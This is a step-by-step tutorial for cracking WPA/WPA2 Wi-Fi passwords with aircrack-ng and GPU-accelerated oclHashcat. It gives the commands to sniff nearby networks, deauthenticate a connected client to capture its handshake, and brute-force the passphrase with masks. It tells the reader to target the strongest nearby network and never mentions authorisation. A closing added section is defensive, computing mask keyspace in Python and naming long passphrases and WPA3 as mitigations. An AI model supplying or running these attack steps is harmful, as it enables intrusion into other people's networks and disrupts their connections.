devil

How to Use GPU to Speed Up WPA/WPA2 Password Cracking

There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphics Processing Unit) is far faster than a CPU for this kind of computation, so we'll use the power of the GPU to speed up WPA/WPA2 cracking.
The tools used will be (both are available for Windows and Linux):
  1. Aircrack-ng
  2. oclHashcat
This guide assumes the following things:
  • wlan0 is a Wi-Fi interface
  • mon0 is the interface in monitor mode
  • <channel> refers to the channel the target Wi-Fi is operating on
  • 00:2d:37:4b:e4:d5 is the MAC address of the target AP (access point) (not real)
  • cc:cc:4e:5b:d7:3d is the MAC address of a client associated with the target AP (not real)
  • # (hash symbol) is used to mark the start of a command


Steps:
Open up a terminal.
Start by putting the Wi-Fi interface in monitor mode:
# airmon-ng start wlan0
This puts the Wi-Fi card in monitor mode and creates a new interface, mon0, to sniff traffic.
Then, start sniffing the air for all APs in the area:
# airodump-ng mon0
This will give you information about all APs in your vicinity. Select the one with the highest signal strength and focus on that one.
Press Ctrl+C to stop the above command and type:
# airodump-ng -c <channel> --bssid 00:2d:37:4b:e4:d5 -w <capture_prefix> mon0


This command only sniffs for one specific AP:
-c tells which channel to sniff on
--bssid is the MAC address of the AP to target
-w tells airodump-ng to write the captured traffic to a file (the handshake in it is used later to recover the password)
mon0 is the monitor interface

Notice the MAC address of clients shown in the terminal; we’ll need it for the next step.

Now, open a second terminal and type:
# aireplay-ng -0 5 -a 00:2d:37:4b:e4:d5 -c cc:cc:4e:5b:d7:3d mon0
This command de-authenticates a client from its AP:
-0 tells how many times to send the deauth frame (in this case, 5 times)
-a tells the MAC address of the AP
-c tells the MAC address of the client connected to the AP (Note: you can do a broadcast deauth, but it doesn't work all the time. Target a specific client instead.)

mon0 is our interface. Once airodump-ng shows that the WPA handshake has been captured (in the upper-right corner), stop the aireplay-ng process (otherwise, it keeps deauthing the clients).
Once the handshake has been captured and written to a file (in .cap format), clean the file using the following command:
# wpaclean clean_file.cap captured.cap
Here, clean_file.cap is the output file and captured.cap is the input file (the file you captured).

Now, prepare the file for hashcat with:
# aircrack-ng clean_file.cap -J for_cat
Here, clean_file.cap is the file from the previous step, and for_cat is the output for hashcat (aircrack-ng automatically adds the .hccap extension).

Now, begin the cracking process with:
# oclhashcat -m 2500 -a 3 --session=my_session /for_cat.hccap /mymask.hcmask
Here, -m 2500 tells hashcat to crack WPA/WPA2
-a 3 tells it to use brute force, or rather mask-based brute force (more on it later)
--session=my_session tells it to save the session (in case you plan to resume it later; a run takes a very long time)
/for_cat.hccap is the path to your captured, cleaned and prepared hashcat file
/mymask.hcmask is the path to the mask file

Once it's done, the recovered password will be stored in a .pot file (located in /usr/share/oclhashcat/ on Kali).

NOTES ON HASHCAT MASKS
A mask is built from the following placeholders:
  • ?u for upper case letters (ABC…)
  • ?l for lower case letters (abc…)
  • ?d for digits
  • ?s for symbols (ASCII only, I think)
  • ?a for all of the above characters
Thus, to create a mask, type the following in a blank file:
  • ?d?d?d?d?d?d?d?d for an 8-digit password
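The length of the `-a 3` run above is decided entirely by how many candidates the mask generates, which is also the number a defender needs when judging whether a Wi-Fi passphrase policy is within reach of a mask attack. The following Python is an added example, not part of the original tutorial: it parses hashcat mask syntax (the placeholders listed above plus hashcat's other built-in charsets, `??` as a literal question mark, and fixed literal characters) and computes the keyspace; the hash rate used in the demo is a constructed figure, not a benchmark.

```python
# Added example: keyspace of a hashcat-style mask.
# Charset sizes are hashcat's built-in ones: ?l and ?u are 26 letters,
# ?d is 10 digits, ?h/?H 16 hex digits, ?s 33 printable ASCII symbols,
# ?a all 95 printable ASCII characters, ?b all 256 byte values.
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "h": 16, "H": 16,
                 "s": 33, "a": 95, "b": 256}


def mask_keyspace(mask: str) -> int:
    """Return how many candidate passwords the mask generates.

    '?x' multiplies the keyspace by the size of charset x, '??' is a
    literal '?', and any other character is a fixed literal (factor 1).
    Unknown charsets and a trailing lone '?' raise ValueError.
    """
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1                      # fixed literal, one candidate
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        code = mask[i + 1]
        if code == "?":
            pass                        # escaped literal question mark
        elif code in CHARSET_SIZES:
            total *= CHARSET_SIZES[code]
        else:
            raise ValueError(f"unknown charset ?{code}")
        i += 2
    return total


def seconds_to_exhaust(mask: str, hashes_per_second: float) -> float:
    """Worst-case time to try every candidate at a given hash rate."""
    return mask_keyspace(mask) / hashes_per_second


if __name__ == "__main__":
    RATE = 100_000.0  # constructed rate (H/s) for illustration only
    for m in ["?d?d?d?d?d?d?d?d", "?u?l?l?l?l?l?d?d", "?a" * 12]:
        secs = seconds_to_exhaust(m, RATE)
        print(f"{m:26} keyspace={mask_keyspace(m):.3e} "
              f"exhaust={secs / 86400:.1f} days at {RATE:.0f} H/s")
```

The 8-digit mask from the tutorial is 10^8 candidates, while a 12-character mask over `?a` is 95^12, which is why a long random passphrase (or WPA3/802.1X) is the mitigation, not a fancier mask.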

That’s it for this tutorial.

